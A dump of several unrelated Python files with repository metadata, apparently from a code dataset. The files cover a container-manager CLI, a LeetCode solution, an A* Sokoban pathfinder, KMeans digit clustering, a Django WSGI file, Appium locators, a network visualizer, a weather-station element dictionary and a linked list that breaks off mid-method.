c313302f1063157d58dec8f1c153c548cd3ba447 | baf024d5b45a229b54c906f3f187bd7b655e3c8f | /eat.py | c2efd494839edddad58152df9225d729d8c62c17 | [] | no_license | breathingM/pomelo | f9e7a206aeed80fe5dd4faf7c5456cc20e1829f8 | 5d966a7b150078e57713597ee8af830269b88854 | refs/heads/master | 2021-01-15T08:58:33.803047 | 2015-11-03T04:02:45 | 2015-11-03T04:02:45 | 45,440,487 | 1 | 0 | null | 2015-11-03T03:55:41 | 2015-11-03T03:55:41 | null | UTF-8 | Python | false | false | 1,216 | py | #!/usr/bin/env python
import sys
import getopt
import pomelo
def usage():
    # Print the supported command-line switches and exit successfully.
    # (Python 2 syntax: print statement.)
    print "Usage:%s [-h] [--help|--run|--renew|--off|--update|--del|--nginx|--clear] args..." % (sys.argv[0])
    sys.exit(0)
if "__main__" == __name__:
    # Command-line front end for the Pomelo container manager: parse the
    # long options and dispatch each to the matching Pomelo method.
    obj = pomelo.Pomelo()
    try:
        opts, args = getopt.getopt(sys.argv[1:], "h", ["help", "run", "renew", "off=", "roll", "del=", "nginx", "update", "clear"]);
    except getopt.GetoptError as err:
        print str(err)
        usage()
    for o, a in opts:
        if o in ("-h", "--help"):
            usage()
        elif o in ("--run"):
            obj.create_container()
        elif o in ("--renew"):
            obj.renew_nginx_setting()
        elif o in ("--off"):
            # --off takes one id in its argument plus any trailing ids.
            fpmIds = [a]
            for i in args:
                fpmIds.append(i)
            obj.offline_fpm(fpmIds)
        elif o in ("--update"):
            obj.rolling_update()
        elif o in ("--del"):
            # Same id-collection scheme as --off.
            fpmIds = [a]
            for i in args:
                fpmIds.append(i)
            obj.delete_container(fpmIds)
        elif o in ("--nginx"):
            obj.run_nginx_container()
        elif o in ("--clear"):
            obj.clear_old_container()
    sys.exit(0)
| [
"jingfu99@gmail.com"
] | jingfu99@gmail.com |
046ca5f5acec77e43d50ee66cec87798ea1834ca | 2242a9eded33d7cf1b62ede1e9ab4c2f17e95bb5 | /June-LeetCode-Challenge/Maximum Units on a Truck/maxUnits.py | 31221300b8468261cc31a7a22fb867be1c24f376 | [] | no_license | RiyaThakore/Python-Programs | 8b5a316c58a779f1a14fa363e79871831b086202 | 399e8307196599027f0c412666987b33c89f7ac6 | refs/heads/main | 2023-08-29T05:48:02.447338 | 2021-11-01T02:27:45 | 2021-11-01T02:27:45 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 486 | py | class Solution(object):
def maximumUnits(self, boxTypes, truckSize):
boxTypes.sort(key = lambda x: x[1])
output,box=0,0
for i in range(len(boxTypes)-1,-1,-1):
box+=boxTypes[i][0]
if box < truckSize:
output+=(boxTypes[i][0]*boxTypes[i][1])
else:
output+=((truckSize-(box-boxTypes[i][0]))*boxTypes[i][1])
return (output)
break
return (output)
| [
"noreply@github.com"
] | RiyaThakore.noreply@github.com |
2938b2104b3f37ffe030d79ac4eb792d5a521b37 | 11d021d531b9fec3fa782131e89233c8d2e3169d | /sokoban-python/Pathfind_Algorithms2.py | 85c63b85f06ef6912195da326adc24da9a8577ee | [] | no_license | atopion/sokoban | a2992eeaf49a1fbdede6630992696dcdf05cfd89 | bfab7b0f4fc1f18b15b14333c1ddbd9621fbecc2 | refs/heads/master | 2020-04-15T18:52:00.996313 | 2019-04-14T19:44:12 | 2019-04-14T19:44:12 | 164,928,759 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,715 | py | import Metrics
import Map
class Pathfind_Algorithms:
    """A* path finding over a grid stored as a flat (row-major) array.

    Every cell of the cleared map is wrapped in a Node so the search can
    attach per-cell scores (G, H) and parent links.
    """
    def __init__(self, map):
        # Row width, used to convert between flat indices and grid rows.
        self.width = map.width
        # Work on a copy so the original map data is left untouched.
        self.cleared_map = map.getClearedMap().copy()
        # Wrap every raw tile value in a Node that remembers its flat index.
        for i in range(len(self.cleared_map)):
            self.cleared_map[i] = Node(self.cleared_map[i], i)
    def children(self, point, box_array):
        """Return copies of the four orthogonal neighbours of *point* that are
        not occupied by a box and whose tile value is odd.
        NOTE(review): the odd-value test presumably marks walkable tiles -
        confirm against the Map tile encoding. Neighbour indices are not
        bounds-checked, so the map border is assumed to be walled.
        """
        links = [self.cleared_map[d].copy() for d in
                 [point.point - 1, point.point + 1, point.point - self.width, point.point + self.width]]
        links = [l for l in links if l.point not in box_array]
        return [link for link in links if link.value % 2 != 0]
    #def manhattan(self, point, point2):
    #    return abs(point.point % self.width - point2.point % self.width) + abs(
    #        point.point // self.width - point2.point // self.width)
    def A_sternchen(self, start1, goal1, box_array):
        """A* ("A-Sternchen") from flat index *start1* to *goal1*.

        Returns the path as a list of Nodes ordered start -> goal.
        Raises ValueError when the goal is unreachable.
        NOTE(review): Node defines no __eq__/__hash__, so the `in openset` /
        `in closedset` tests below compare object identity, and children()
        hands out fresh copies each expansion - revisited cells are never
        recognised, so the closed-set pruning looks ineffective. Verify
        intended behaviour before optimising around it.
        """
        # start = Node(self.cleared_map[start], start)
        # goal = Node(self.cleared_map[goal], goal)
        start = self.cleared_map[start1]
        goal = self.cleared_map[goal1]
        # The open and closed sets
        openset = set()
        closedset = set()
        # Current point is the starting point
        current = start
        # Add the starting point to the open set
        openset.add(current)
        # While the open set is not empty
        while openset:
            # Find the item in the open set with the lowest G + H score
            current = min(openset, key=lambda o: o.G + o.H)
            # If it is the item we want, retrace the path and return it
            if current.point == goal1:
                path = []
                while current.parent:
                    path.append(current)
                    current = current.parent
                path.append(current)
                return path[::-1]
            # Remove the item from the open set
            openset.remove(current)
            # Add it to the closed set
            closedset.add(current)
            # Loop through the node's children/siblings
            for node in self.children(current, box_array):
                # If it is already in the closed set, skip it
                if node in closedset:
                    continue
                # Otherwise if it is already in the open set
                if node in openset:
                    # Check if we beat the G score
                    new_g = current.G + current.move_cost()
                    if node.G > new_g:
                        # If so, update the node to have a new parent
                        node.G = new_g
                        node.parent = current
                    else:
                        continue
                else:
                    # If it isn't in the open set, calculate the G and H score for the node
                    node.G = current.G + current.move_cost()
                    node.H = Metrics.Metrics.manhattan_distance(node.point, goal.point, self.width) #.manhattan(node, goal)
                    # Set the parent to our current item
                    node.parent = current
                    # Add it to the set
                    openset.add(node)
        # Throw an exception if there is no path
        raise ValueError('No Path Found')
class Node:
    """Search node wrapping one cell of the cleared map.

    Identity semantics are deliberate: no __eq__/__hash__ are defined, so
    set membership in the A* search compares object identity.
    """

    def __init__(self, value, point):
        self.value = value    # raw tile code from the cleared map
        self.point = point    # flat index of the cell in the map array
        self.parent = None    # predecessor on the best known path
        self.H = 0            # heuristic estimate to the goal
        self.G = 0            # cost accumulated from the start

    def move_cost(self):
        """Every step between adjacent tiles costs the same."""
        return 1

    def __str__(self):
        return "%s" % self.point

    def __repr__(self):
        return str(self)

    def copy(self):
        """Fresh node carrying the same map data but no search state."""
        return Node(self.value, self.point)
| [
"atopion@outlook.com"
] | atopion@outlook.com |
f2604b7d0735b32b57e274d09c579d5ddc0b046c | 1d4c8db10e0965b60f398d5ab907c0516753c853 | /handwriting_unsupervised_AI.py | 59b6073b6417445ed6185a5eeacaa30febb2b71f | [] | no_license | mattielangford/handwriting_unsupervised | 1c02535979bc120c663a839a7a155ecae7feaf49 | 5c30632e862fd4958b7c77ece7d2b16370307f74 | refs/heads/master | 2020-05-26T16:07:29.381456 | 2019-05-23T20:01:29 | 2019-05-23T20:01:29 | 188,298,421 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,767 | py | import codecademylib3_seaborn
import numpy as np
from matplotlib import pyplot as plt
from sklearn import datasets
from sklearn.cluster import KMeans
#From a total of 43 people, 30 contributed to the training set and different 13 to the test set.
# sklearn's 8x8 handwritten-digit images with their true labels (0-9).
digits = datasets.load_digits()
print(digits.data)
print(digits.target)
#plt.gray()
#plt.matshow(digits.images[100])
#plt.show()
#print(digits.target[100])
# Ten clusters - one per digit - with a fixed seed for reproducibility.
model = KMeans(n_clusters = 10, random_state = 42)
model.fit(digits.data)
fig = plt.figure(figsize=(8, 3))
fig.suptitle("Cluser Center Images", fontsize=14, fontweight='bold')
for i in range(10):
# Initialize subplots in a grid of 2X5, at i+1th position
ax = fig.add_subplot(2, 5, 1 + i)
# Display images
ax.imshow(model.cluster_centers_[i].reshape((8, 8)), cmap=plt.cm.binary)
plt.show()
new_samples = np.array([
[0.00,0.00,0.00,3.02,7.53,4.33,2.73,0.00,0.00,0.00,0.97,7.38,5.77,5.92,7.07,0.29,0.00,0.23,5.93,7.39,1.20,3.40,7.62,2.73,0.00,4.77,7.62,2.65,0.75,2.11,7.62,4.27,2.64,7.61,7.44,7.30,7.60,7.60,7.62,5.56,2.57,6.09,5.78,4.47,2.74,2.12,4.95,6.78,0.00,0.00,0.00,0.00,0.00,0.00,3.42,7.62,0.00,0.00,0.00,0.00,0.00,0.00,2.19,7.62],
[0.00,0.00,1.43,2.28,2.28,0.45,0.00,0.00,1.13,5.91,7.60,7.61,7.62,6.01,0.22,0.00,3.72,7.61,3.55,1.06,2.73,7.62,2.43,0.00,0.45,1.82,0.00,0.00,0.07,7.62,3.05,0.00,0.75,4.25,5.33,4.63,2.04,7.62,2.97,0.00,4.48,7.52,5.85,7.45,7.62,6.93,0.67,0.00,3.94,7.53,4.71,7.54,7.53,7.53,4.85,1.06,0.60,6.39,6.85,4.93,0.90,4.53,7.54,3.35],
[0.00,0.00,0.60,2.12,2.28,2.96,0.22,0.00,0.00,3.33,7.54,7.61,7.61,7.61,1.29,0.00,0.60,7.45,5.54,1.88,3.33,7.62,0.76,0.00,1.52,7.62,2.20,0.00,6.14,6.92,0.15,0.00,0.60,7.07,7.30,6.08,7.62,3.63,0.00,0.00,0.00,1.21,5.47,7.62,7.61,6.99,0.37,0.00,0.00,0.07,6.38,6.77,3.41,7.62,0.76,0.00,0.00,1.51,7.61,6.75,6.63,7.54,0.53,0.00],
[0.00,0.00,0.00,0.00,0.00,0.00,0.00,0.00,0.00,2.88,5.34,5.33,5.33,5.10,0.30,0.00,1.51,7.62,6.16,5.33,6.53,7.62,0.75,0.00,2.28,7.62,4.64,4.26,7.14,7.62,0.76,0.00,0.59,5.77,6.86,6.85,6.39,7.62,0.76,0.00,0.00,0.00,0.00,0.00,2.28,7.62,0.76,0.00,0.00,0.00,0.00,0.00,2.28,7.62,0.76,0.00,0.00,0.00,0.00,0.00,2.28,7.62,0.76,0.00]
])
new_labels = model.predict(new_samples)
print(new_labels)
#map out each of the labels with the digits we think it represents
for i in range(len(new_labels)):
if new_labels[i] == 0:
print(0, end='')
elif new_labels[i] == 1:
print(9, end='')
elif new_labels[i] == 2:
print(2, end='')
elif new_labels[i] == 3:
print(1, end='')
elif new_labels[i] == 4:
print(6, end='')
elif new_labels[i] == 5:
print(8, end='')
elif new_labels[i] == 6:
print(4, end='')
elif new_labels[i] == 7:
print(5, end='')
elif new_labels[i] == 8:
print(7, end='')
elif new_labels[i] == 9:
print(3, end='') | [
"noreply@github.com"
] | mattielangford.noreply@github.com |
6eeb4dc855546f60cc8bafdb28339212ab8eb907 | b37b514233094763d124f287acb3a833834108f0 | /Pattern.py | 6af2685ed1e2fa748881f5e4f96428eceb21de39 | [] | no_license | gorillacodes/HelloWorld- | 53c334c83b73a16efcc53178ba6ce71246ef87fd | bd34fb0e5410368e11691634f2a5026957e5965a | refs/heads/main | 2023-03-30T22:41:17.162244 | 2021-03-25T19:27:14 | 2021-03-25T19:27:14 | 328,973,633 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 139 | py | n = int(input("Enter no. of rows: "))
# Right-angled star triangle: row i holds exactly i asterisks.
for row in range(1, n + 1):
    print("*" * row)
| [
"noreply@github.com"
] | gorillacodes.noreply@github.com |
4f5852459dd41126a6aadfebbcaa51b7355f19b2 | 16810cd83941d7d900c39420fc2ea912e38d6159 | /finalP/wsgi.py | db54015cdcda7566853984faba981536fe732eb7 | [
"MIT"
] | permissive | danielskiptoo/foreCast | 737f830cef0e2e3cd6a37ddb05f47da67bd3b966 | f2946b613ae174144716eefdfc0654ccbf7a9b27 | refs/heads/master | 2023-04-15T09:17:28.107693 | 2023-04-03T10:37:16 | 2023-04-03T10:37:16 | 127,606,366 | 0 | 0 | MIT | 2022-12-08T00:57:24 | 2018-04-01T07:13:35 | JavaScript | UTF-8 | Python | false | false | 389 | py | """
WSGI config for finalP project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.0/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
# Point Django at this project's settings module before the app is built.
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "finalP.settings")
# Module-level WSGI callable that servers (gunicorn, uWSGI, ...) import.
application = get_wsgi_application()
| [
"kiptood6@gmail.com"
] | kiptood6@gmail.com |
2acd1397408b43bcf0280ad2d0d33cf4fc765b86 | eada63ec0ed309ef817e3a75603b199a91952b6d | /pythonProject/Locators/LocatorsDateSelectionScreen.py | 2f3fb7504068472191485d4aec648dfa1666cc83 | [] | no_license | DandresPer/appium_poc_booking | ffef39dbb28f69e2381cc160bfbfd1588fc30b39 | 2a3dc644fed4b553a06c2995b1d45e213d771dde | refs/heads/main | 2023-01-21T09:30:49.493056 | 2020-11-30T09:51:41 | 2020-11-30T09:51:41 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 763 | py | import calendar
import datetime
from Locators.Locators import Locator
def generate_dates(time_between_dates, start=None):
    """Return a (start, end) pair of dates formatted as 'DD Month YYYY'.

    Parameters:
        time_between_dates: number of days between the two returned dates.
        start: optional datetime to base the pair on; defaults to "now",
            which preserves the original behaviour for existing callers.
            Passing it makes the function deterministic and testable.
    """
    now = start if start is not None else datetime.datetime.now()
    date_1 = f"{now.day:02d} " + calendar.month_name[now.month] + " " + str(now.year)
    then = now + datetime.timedelta(days=time_between_dates)
    date_2 = f"{then.day:02d} " + calendar.month_name[then.month] + " " + str(then.year)
    return date_1, date_2
class LocatorsDateSelectionScreen(Locator):
    """Locators for the booking.com check-in/check-out calendar screen."""

    # Calendar widget and its confirmation button (Android resource ids).
    calendar_view = "com.booking:id/bui_calendar_view"
    confirm_button = "com.booking:id/calendar_confirm"

    # Stay dates: today and fifteen days from now, computed at import time.
    date_1, date_2 = generate_dates(15)

    # XPath selectors for the two day cells, matched by content description.
    initial_date_android = '//android.view.View[@content-desc="{}"]'.format(date_1)
    end_date_android = '//android.view.View[@content-desc="{}"]'.format(date_2)
| [
"danielanper@hotmail.com"
] | danielanper@hotmail.com |
a7088d8f59c39486be2953ab3e1975839fd8c83a | a27ec396d8ad24a5c93557249c55c61de2ba8f68 | /Visual_cir.py | 32528cde5eac4683008cc592dba3e931577ea8d6 | [] | no_license | sophieball/VisualNW | 28e9e77e3f4dc3b57abf2187a6f5b07d95e1eafd | 90431d8a39b9783a154e507f39ad762822804b1b | refs/heads/master | 2021-01-10T18:49:11.588122 | 2016-12-15T04:12:44 | 2016-12-15T04:12:44 | 58,431,591 | 0 | 0 | null | 2016-12-15T04:12:44 | 2016-05-10T05:13:15 | C | UTF-8 | Python | false | false | 5,742 | py | import graphics
from graphics import *
import re
import copy
vfile = open("freq", "r")
hasharr = [0]
srcs = []
dests = []
src_sqs = []
src_sqs_old = []
src_texts = []
src_texts_old = src_texts = []
src_freq = []
src_cur = []
src_last = []
dest_sqs = []
dest_sqs_old = []
dest_texts = []
dest_texts_old = []
dest_freq = []
dest_cur = []
dest_last = []
circles = []
circles_old = []
freqs = []
pos = [(100, 250), (200, 250), (300, 250), (400, 250), (500, 250), (600, 250), (700, 250), (800, 250), (900, 250), (1000, 250), (1100, 250), (1200, 250), (1300, 250),
(100, 500), (200, 500), (300, 500), (400, 500), (500, 500), (600, 500), (700, 500), (800, 500), (900, 500), (1000, 500), (1100, 500), (1200, 500), (1300, 500)]
pos_taken = [0] * 26
gap = 10
src_lines = []
src_lines_old = []
dest_lines = []
dest_lines_old = []
hfile = open("arrout", "r")
hline = hfile.readline()
while(len(hline) != 0):
if(hline not in hasharr):
hasharr.append(hline)
hline = hfile.readline()
hfile.close()
win = GraphWin("visual", 1400, 800, autoflush = False)
vline = vfile.readline()
while(len(vline) != 0):
while("ROOT" not in vline and len(vline) != 0):
vline = vfile.readline()
vline = vfile.readline()
src_freq = [0] * len(src_freq)
dest_freq = [0] * len(dest_freq)
src_last = copy.copy(src_cur)
src_cur = []
dest_last = copy.copy(dest_cur)
dest_cur = []
while("===" not in vline and len(vline) != 0):
i = int(vline.split(' ')[0])
ip = hasharr[i]
src = ip.split(' ')[0]
dest = ip.split(' ')[1]
dest = dest.split('\n')[0]
m = re.search('\((.|.+?)\)', vline)
print m.group(1)
if(int(m.group(1)) > 2):
if src in srcs:
src_freq[srcs.index(src)] = int(m.group(1))
else:
srcs.append(src)
src_freq.append(int(m.group(1)))
src_cur.append(srcs.index(src))
if dest in dests:
dest_freq[dests.index(dest)] = int(m.group(1))
else:
dests.append(dest)
dest_freq.append(int(m.group(1)))
dest_cur.append(dests.index(dest))
vline = vfile.readline()
#draw circles
for c in circles_old:
if c not in circles:
c.undraw()
center = c.getCenter()
pos_taken[pos.index((center.getX(), center.getY()))] = 0
for s in src_sqs_old:
if s not in src_sqs:
s.undraw()
for d in dest_sqs_old:
if d not in dest_sqs:
d.undraw()
for l in src_lines_old:
if l not in src_lines:
l.undraw()
for l in dest_lines_old:
if l not in dest_lines:
l.undraw()
for c in circles:
c.setFill("blue3")
c.setOutline("blue3")
for s in src_sqs:
s.setFill("purple3")
s.setOutline("purple3")
for d in dest_sqs:
d.setFill("purple3")
d.setOutline("purple3")
for l in src_lines:
l.setFill("grey")
l.setOutline("grey")
for l in dest_lines:
l.setFill("grey")
l.setOutline("grey")
circles_old = copy.copy(circles)
circles = []
src_sqs_old = copy.copy(src_sqs)
src_sqs = []
dest_sqs_old = copy.copy(dest_sqs)
dest_sqs = []
src_lines_old = src_lines
src_lines = []
dest_lines_old = dest_lines
dest_lines = []
freqs_old = copy.copy(freqs)
freqs = []
dest_texts_old = copy.copy(dest_texts)
dest_texts = []
src_texts_old = copy.copy(src_texts)
src_texts = []
for i in range(0, len(src_cur)):
if i not in circles_old:
center = pos[pos_taken.index(0)]
print center
circles.append(Circle(Point(center[0], center[1]), max(10, src_freq[src_cur[i]])));
pos_taken[pos_taken.index(0)] = 1
print pos_taken
circles[i].setFill("blue")
circles[i].setOutline("blue")
circles[i].draw(win)
src_sqs.append(Rectangle(Point(center[0]+40, center[1] -75), Point(center[0]-40, center[1] - 100)))
src_sqs[i].setFill("purple")
src_sqs[i].setOutline("purple")
src_sqs[i].draw(win)
dest_sqs.append(Rectangle(Point(center[0]+40, center[1] +75 ), Point(center[0]-40, center[1] +100)))
dest_sqs[i].setFill("purple")
dest_sqs[i].setOutline("purple")
dest_sqs[i].draw(win)
src_lines.append(Line(Point(src_sqs[i].getCenter().getX(), src_sqs[i].getCenter().getY()+15), Point(circles[i].getCenter().getX(), circles[i].getCenter().getY() - circles[i].getRadius())))
src_lines[i].setArrow('last')
src_lines[i].draw(win)
dest_lines.append(Line(Point(dest_sqs[i].getCenter().getX(), dest_sqs[i].getCenter().getY()-15), Point(circles[i].getCenter().getX(), circles[i].getCenter().getY() + circles[i].getRadius())))
dest_lines[i].setArrow('first')
dest_lines[i].draw(win)
src_texts.append(Text(src_sqs[i].getCenter(), str(srcs[src_cur[i]])))
src_texts[i].setSize(8)
src_texts[i].setFill("white")
src_texts[i].draw(win)
dest_texts.append(Text(dest_sqs[i].getCenter(), str(dests[dest_cur[i]])))
dest_texts[i].setSize(8)
dest_texts[i].setFill("white")
dest_texts[i].draw(win)
freqs.append(Text(circles[i].getCenter(), str(src_freq[src_cur[i]] / 1000.0 * 100.0) + "%"))
freqs[i].setFill("white")
freqs[i].draw(win)
update()
time.sleep(1)
| [
"qiuhuilian1991@gmail.com"
] | qiuhuilian1991@gmail.com |
78bdeb60776945af0767cacef1889faf05164dbc | b233b6461bb7af4d8b64275f740668ec3836c51e | /floydNumber.py | 63687fbf853c71be46bf3b0af41370953581666c | [
"MIT"
] | permissive | shubham2704/codes_instagram | 212821128582ba59a4e6405eab1278c2ce2f0937 | c95aab74aabb4af9d4baa5c7b26698d8f77a95eb | refs/heads/master | 2022-11-24T17:51:04.035629 | 2020-08-05T14:43:16 | 2020-08-05T14:43:16 | 269,327,521 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 168 | py | n = int(input("Enter the number of rows in floyd's triangle"))
# Floyd's triangle: consecutive integers laid out in rows of growing length.
a = 1
for row in range(1, n + 1):
    for _ in range(row):
        print(a, end='')
        a += 1
    print()
| [
"cool.shubham2704@gmail.com"
] | cool.shubham2704@gmail.com |
b51ac12b70717c54b15760648a95a50bb8013523 | b36c065d9fe10a6a9bf42415f3a716565ba26756 | /old_code/basicdatas/dicts.py | e4c860a52e2b343ae12c7d32c9bedfb1cc78cc21 | [] | no_license | fanghongbin/nmc_met_class | a447255ce43b2b8f33ee2db584e55483ce68d82c | b59e5ab68c47d83c70c0d7081ca23dce72bf8c75 | refs/heads/master | 2022-02-13T05:25:40.201333 | 2019-05-09T06:54:58 | 2019-05-09T06:54:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,942 | py | #!/usr/bin/python3.6
# -*- coding:UTF-8 -*-
import mymethods.str_finder as finder
gds_station_data_element_name_id = {
"经度":1,
"纬度":2,
"测站高度":3,
"测站级别(short)":4,
"测站类型(short)":5,
"气压传感器海拔高度":6,
"温湿传感器离地面高度":7,
"温湿传感器距水面高度":8,
"风速传感器距地面高度":9,
"风传感器距甲板平台高度":10,
"风速传感器距水面高度":11,
"移动平台移动方向":12,
"移动平台移动速度":13,
"海盐传感器距海面深度":14,
"浪高传感器距海面高度":15,
"浮标方位":16,
"总水深":17,
"海面/水面以下深度":18,
"船面距海面高度":19,
"方位或方位角":20,
"字符型站名":21,
"风向":201,
"风速":203,
"1分钟平均风向":205,
"1分钟平均风速":207,
"2分钟平均风向":209,
"2分钟平均风速":211,
"10分钟平均风向":213,
"10分钟平均风速":215,
"最大风速的风向":217,
"最大风速":219,
"瞬时风向":221,
"瞬时风速":223,
"极大风速的风向":225,
"极大风速":227,
"过去6小时极大瞬时风速的风向":229,
"过去6小时极大瞬时风速":231,
"过去12小时极大瞬时风速的风向":233,
"过去12小时极大瞬时风速":235,
"风力(short)":237,
"海平面气压":401,
"3小时变压":403,
"24小时变压":405,
"本站气压":407,
"最高气压":409,
"最低气压":411,
"气压":413,
"日平均气压":415,
"日平均海平面气压":417,
"高度(探空)":419,
"位势高度(探空)":421,
"温度":601,
"最高气温":603,
"最低气温":605,
"24小时变温":607,
"过去24小时最高气温":609,
"过去24小时最低气温":611,
"日平均气温":613,
"露点温度":801,
"温度露点差":803,
"相对湿度":805,
"最小相对湿度":807,
"日平均相对湿度":809,
"水汽压":811,
"日平均水汽压":813,
"降水量":1001,
"1小时降水":1003,
"3小时降水":1005,
"6小时降水":1007,
"12小时降水":1009,
"24小时降水":1011,
"日总降水":1013,
"20-08时降水量":1015,
"08-20时降水量":1017,
"20-20时降水量":1019,
"08-08时降水量":1021,
"蒸发":1023,
"蒸发(大型)":1025,
"可降水分(预报降水量)":1027,
"1分钟平均水平能见度":1201,
"10分钟平均水平能见度":1203,
"最小水平能见度":1205,
"水平能见度(人工)":1207,
"总云量":1401,
"低云量":1403,
"云底高度":1405,
"低云状(short)":1407,
"中云状(short)":1409,
"高云状(short)":1411,
"日平均总云量":1413,
"日平均低云量":1415,
"云量(低云或中云)":1417,
"云类型(short)":1419,
"现在天气(short)":1601,
"过去天气1(short)":1603,
"过去天气2(short)":1605,
"龙卷类型(short)":1801,
"龙卷所在方位(short)":1803,
"最大冰雹直径":1805,
"雷暴(short)":1807,
"电流强度(闪电定位)":1809,
"地面温度":2001,
"最高地面温度":2003,
"最低地面温度":2005,
"过去12小时最低地面温度":2007,
"5cm地温":2009,
"10cm地温":2011,
"15cm地温":2013,
"20cm地温":2015,
"40cm地温":2017,
"80cm地温":2019,
"160cm地温":2021,
"320cm地温":2023,
"草面(雪面)温度":2025,
"草面(雪面)最高温度":2027,
"草面(雪面)最低温度":2029,
"日平均地面温度":2031,
"日平均5cm地温":2033,
"日平均10cm地温":2035,
"日平均15cm地温":2037,
"日平均20cm地温":2039,
"日平均40cm地温":2041,
"日平均80cm地温":2043,
"日平均160cm地温":2045,
"日平均320cm地温":2047,
"日平均草面(雪面)温度":2049,
"地面状态(short)":2201,
"积雪深度":2203,
"雪压":2205,
"电线积冰直径":2207,
"电线积冰-现象(short)":2209,
"电线积冰-南北方向直径":2211,
"电线积冰-南北方向厚度":2213,
"电线积冰-南北方向重量":2215,
"电线积冰-东西方向直径":2217,
"电线积冰-东西方向厚度":2219,
"电线积冰-东西方向重量":2221,
"船上结冰原因(short)":2223,
"船上结冰厚度":2225,
"船上结冰速度(short)":2227,
"海冰密集度(short)":2229,
"冰情发展(short)":2231,
"冰总量和类型(short)":2233,
"冰缘方位":2235,
"冰情(short)":2237,
"最高气压出现时间":10001,
"最低气压出现时间":10003,
"最高气温出现时间":10005,
"最低气温出现时间":10007,
"最小相对湿度出现时间":10009,
"最大风速出现时间":10011,
"极大风速出现时间":10013,
"最高地面温度出现时间":10015,
"最低地面温度出现时间":10017,
"草面(雪面)最低温度出现时间":10019,
"草面(雪面)最高温度出现时间":10021,
"最小水平能见度出现时间":10023,
"天气出现时间":10025,
"海表最高温度出现时间":10027,
"海表最低温度出现时间":10029,
"最大波高出现时间":10031,
"风速表类型":2401,
"湿球温度测量方法":2403,
"海面温度测量方法":2405,
"洋流测量方法":2407,
"气压倾向特征":2409,
"海面温度":2601,
"湿球温度":2603,
"海面盐度":2605,
"海表最高温度":2607,
"海表最低温度":2609,
"海水温度":2611,
"海水盐度":2613,
"海面海流方向":2801,
"海面海流速度":2803,
"洋流方向和速度的平均周期(short)":2805,
"表层海洋面流速":2807,
"表层海洋面波向":2809,
"海流方向":2811,
"海流速度":2813,
"波浪方向":3001,
"波浪周期":3003,
"波浪高度":3005,
"风浪方向":3007,
"风浪周期":3009,
"风浪高度":3011,
"第一涌浪方向":3013,
"第一涌浪周期":3015,
"第一涌浪高度":3017,
"第二涌浪方向":3019,
"第二涌浪周期":3021,
"第二涌浪高度":3023,
"有效波高":3025,
"有效波高的周期":3027,
"平均波高":3029,
"平均波周期":3031,
"最大波高":3033,
"最大波高的周期":3035,
"人工测量浪高":3037,
"仪器测量浪高":3039,
"浪级代码(short)":3041
}
gds_station_data_element_id_name = dict(zip(gds_station_data_element_name_id.values(),gds_station_data_element_name_id.keys()))
def gds_station_data_element_id_finder(input_strs):
ele_names = finder.muti_strs_finder(input_strs,gds_station_data_element_name_id)
names_ids = {}
for names in ele_names:
names_ids[names] = gds_station_data_element_name_id[names]
print(names + " : " + str(names_ids[names]))
return names_ids
class m1_value_column:
站号 = 0
经度 = 1
纬度 = 2
拔海高度 = 3
站点级别 = 4
总云量 =5
风向 = 6
风速 = 7
气压 = 8
小时变压 = 9
过去天气1 = 10
过去天气2 =11
降水6小时 =12
低云状 =13
低云量 =14
低云高 =15
露点 =16
能见度 =17
现在天气 =18
温度 =19
中云状 =20
高云状 =21
标志1 =22
标志2 =23
日变温 = 24
日变压 =25
class m2_value_column:
站号 = 0
经度 = 1
纬度 = 2
拔海高度 = 3
位势高度 = 4
温度 = 5
温度露点差 = 6
风向 = 7
风速 = 8
class m8_value_column:
站号 = 0
经度 = 1
纬度 = 2
拔海高度 = 3
天气现象1 = 4
风向1 = 5
风速1 = 6
最低温度 = 7
最高温度 = 8
天气现象2 = 9
风向2 = 10
风速2 = 11
| [
"liucouhua@163.com"
] | liucouhua@163.com |
1d02c0f0e5fd0054fcf5b645522e66c08cbcd8c7 | 4bbf8034ddc885d7d153625b3f7514cecae512ae | /SINGLY_LINKED_LIST.py | 82840c1e839a2ac7bcc581078d27ce023b998403 | [] | no_license | vampireStromx07/linked-list | 23c3c510205947eb9f35e8c990f3144482f5c56b | 10b45352002d07cad492b126e712e9d7955889ee | refs/heads/master | 2022-12-15T20:34:34.860736 | 2020-09-17T06:52:17 | 2020-09-17T06:52:17 | 296,243,456 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,426 | py | # program for linked list
# SinglyLinkedList
class node: # this will create a node
def __init__(self, data):
self.data = data
self.next = None
class SinglyLinkedList:
def __init__(self):
self.head = None # this will be head node
self.numOfNodes = 0 # this variable shows the sizes of linked list
def insert_first(self, data): # To insert node at the start
new_node = node(data) # this create a node
if self.head is None: # check the head is empty or not
self.head = new_node
self.numOfNodes += 1
else:
new_node.next = self.head
self.head = new_node
self.numOfNodes += 1
def insert_end(self, data): # to create a node at the end
new_node = node(data)
if self.head is None:
self.head = new_node
self.numOfNodes += 1
else:
temp = self.head
while temp.next is not None: # temp node now reaches to the last node
temp = temp.next
temp.next = new_node
self.numOfNodes += 1
def insert_at_pos(self, data, pos):
new_node = node(data)
if self.head is None:
self.head = new_node
else:
count = self.numOfNodes
if 1 <= pos <= count: # check the position is valid or not
self.numOfNodes += 1
if pos == 1:
self.insert_first(data)
elif pos == count:
self.insert_end(data)
else:
temp = self.head
i = 1
while i < pos-1: # now to temp node reaches the nth position (n = pos -1)
temp = temp.next
i += 1
new_node.next = temp.next
temp.next = new_node
else:
print(f"There are {count} nodes in the list.\n "
"Enter a valid position\n")
def remove_first(self):
if self.head is None:
print("There are no nodes in the list.\n") # check the list is empty or not.
elif self.head.next is None: # Only one node is present
self.head = None
else:
temp = self.head # to delete the head node we use temp node
self.head = self.head.next
del temp
self.numOfNodes -= 1
def remove_end(self):
if self.head is None:
print("There are no nodes in the list.\n")
elif self.head.next is None: # Only one node is present
self.head = None
else:
temp = self.head # first we have to reach the last node
